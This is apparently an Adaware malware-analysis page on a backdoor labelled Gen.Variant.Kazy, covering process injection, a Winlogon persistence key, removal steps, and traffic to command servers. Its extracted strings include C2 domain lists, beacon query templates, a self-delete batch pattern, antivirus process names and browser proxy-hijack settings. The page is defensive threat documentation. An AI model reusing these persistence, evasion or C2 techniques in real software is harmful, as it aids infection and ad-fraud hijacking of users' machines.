Gen.Variant.Kazy.52241_456ca29d17 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:256
%original file name%.exe:1336

The Backdoor injects its code into the following process(es):

%original file name%.exe:1776

Mutexes

The following mutexes were created/opened:

ShimCacheMutexSHIMLIB_LOG_MUTEX

File activity

The process %original file name%.exe:1776 makes changes in the file system.

The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (2768 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\8E22D.exe (85929 bytes)
%Program Files%\LP\2D85\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (4392 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (3460 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\2D85\1.exe (0 bytes)

Registry activity

The process %original file name%.exe:1776 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 EA 6F F7 04 6A 25 92 40 93 7A FF 71 F4 5A D6"

The Backdoor adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8E22D.exe"

The process %original file name%.exe:256 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 49 85 7E 4E 85 38 FF 53 84 ED 26 06 F1 76 69"

The process %original file name%.exe:1336 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 13 3D 2E 90 10 BB 37 C9 50 1C 20 90 75 86 73"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:256
%original file name%.exe:1336
Delete the original Backdoor file.
Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (2768 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\8E22D.exe (85929 bytes)
%Program Files%\LP\2D85\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (4392 bytes)
Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8E22D.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	487514	90624	4.71458	ce9502a663e63e621e7322381d9318dc
.rdata	495616	1068	1536	3.11427	ecf2ca661ed5b5ecba619c096025778b
.data	499712	87208	87552	5.50712	2428deb115c36c60dd4d667860907689
.rsrc	589824	4096	512	0.601867	60b5d73b95061e05810539a8a3228bfc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://freedownload3.com/screenshot/4/s/89_3276.gif?sv=996&tq=gwY92w4A+JlHv84NglH87V0ASlBfjt4Ob3KJY02iztsa+8zuK7Izt9IlC8P9wTiBwtKgJ+C+exTNrh+dMLa1/E+iqnhPgSAWgSBWebVGG8iI/TiCt9Gp5RgeUO/+5Rc1zM1Sgz3h04h1A6nE16U4kO0CHZxyF68Ey	114.207.112.26
hxxp://3s3u3v.hoststorageforyou.com/logo.png?sv=538&tq=gKZEtzoYwLzEvUb5dQzRsrCqD/MtTca3l74EgC1OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU=	72.52.4.120
hxxp://jou4eswf-i.firoli-sys.com/logo.png?sv=794&tq=gKZEtzoYwLzEvUb5dQzRsrCqD/MtTca3l74EgC9OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU=	141.8.224.239

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /screenshot/4/s/89_3276.gif?sv=996&tq=gwY92w4A+JlHv84NglH87V0ASlBfjt4Ob3KJY02iztsa+8zuK7Izt9IlC8P9wTiBwtKgJ+C+exTNrh+dMLa1/E+iqnhPgSAWgSBWebVGG8iI/TiCt9Gp5RgeUO/+5Rc1zM1Sgz3h04h1A6nE16U4kO0CHZxyF68Ey HTTP/1.0

Connection: close

Host: freedownload3.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Connection: close

Date: Thu, 16 Apr 2015 06:05:16 GMT

Content-Length: 835

Content-Type: image/gif

Last-Modified: Mon, 13 May 2013 15:59:00 GMT

Accept-Ranges: bytes

ETag: "03a36c8f24fce1:e19"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

GIF89a".".U..!.......,...."."...Z....)k.1c.9s.J{.Z..Z..c.{kk.k..s..s.R{............c.........{...........k........Z.....{........c........Z..s...........B........k...........J................................s.................@.. ....$.@0$.L..9,....Q...N_[m\...e2.M..hp..G...p.<O..]`5==9.3....:.....4'y4.`..1.1.................9..'.=3'..98811&'.),8).83.19.$,..78 7&,::;...........:,..# ;.. .. .# #....,.-.rt&.32d.....@.-f.T(.B...`........\L..q..1......"... .p..G...5....G..!4@.h."....B.ti.b...q^......13..Y....EqN0.........A3...d.. .P...W....T.E.r..].....c_..q.*..6...q2q.....<{7....{..!....x.b..6....e.%.R.d.c..f..eg.f.V.;.....}pX.4.....O....s.*Z8.>..u.&2.0Q.E.i&Rt...<...Yp...%^..)....&...?|(.^n..=....Wq..D.%VSp.6h..H.0.K....\>....pb....<.(..$....:......... .(../(p.A.U A.#.0.. ,p..-H.............2.0..1L.....p..[.PB..h ..d.i..c:...;..

GET /logo.png?sv=538&tq=gKZEtzoYwLzEvUb5dQzRsrCqD/MtTca3l74EgC1OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: 3s3u3v.hoststorageforyou.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.0 404 Not Found

Date: Thu, 16 Apr 2015 06:05:32 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 9

Content-Type: text/html; charset=iso-8859-1

X-Cache: MISS from 930464

Connection: close

not found..

GET /logo.png?sv=794&tq=gKZEtzoYwLzEvUb5dQzRsrCqD/MtTca3l74EgC9OjrPGpgfib1XGp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: jou4eswf-i.firoli-sys.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 06:05:43 GMT

Server: Apache

Set-Cookie: gvc=926vr1767099430906609; expires=Tue, 14-Apr-2020 06:05:43 GMT; path=/; domain=jou4eswf-i.firoli-sys.com; httponly

Vary: Accept-Encoding,User-Agent

Content-Length: 51

Keep-Alive: timeout=5, max=123

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<html><head></head><body></body></html>..

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1776:

`.rsrc

SSj%S

cmd.exe

GetProcessWindowStation

operator

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

copy /b data.tmp code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

t=st&q=%s

%s?tq=%s

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

firoli-sys.com

hoststorageforyou.com

wwwmediahosts.com

hdmediastore.com

halinoiser.com

allforyourimage.com

onlinepdahelpforyou.com

remarkreddomas.com

transfersakkonline.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

hXXp://%s.%s

%s.%s

stor.cfg

exec%s

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

DWN_CON_STRP_%d_%s

hXXp://

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/133.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

GET %s HTTP/1.1

Host: %s

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

milktoyoustudios.com

hXXp://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

hXXp://xprstats.com/images/logo.png

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

xprstats.com

hXXp://%s%s

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

Opera

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

bing.com:80/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\2D85

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

`.rdata

@.data

.rsrc

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

%original file name%.exe_1776_rwx_00400000_0008E000:

`.rsrc

SSj%S

cmd.exe

GetProcessWindowStation

operator

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

copy /b data.tmp code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

t=st&q=%s

%s?tq=%s

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

firoli-sys.com

hoststorageforyou.com

wwwmediahosts.com

hdmediastore.com

halinoiser.com

allforyourimage.com

onlinepdahelpforyou.com

remarkreddomas.com

transfersakkonline.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

hXXp://%s.%s

%s.%s

stor.cfg

exec%s

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

DWN_CON_STRP_%d_%s

hXXp://

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/133.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

GET %s HTTP/1.1

Host: %s

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

milktoyoustudios.com

hXXp://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

hXXp://xprstats.com/images/logo.png

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

xprstats.com

hXXp://%s%s

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

Opera

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

bing.com:80/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\2D85

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

`.rdata

@.data

.rsrc

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps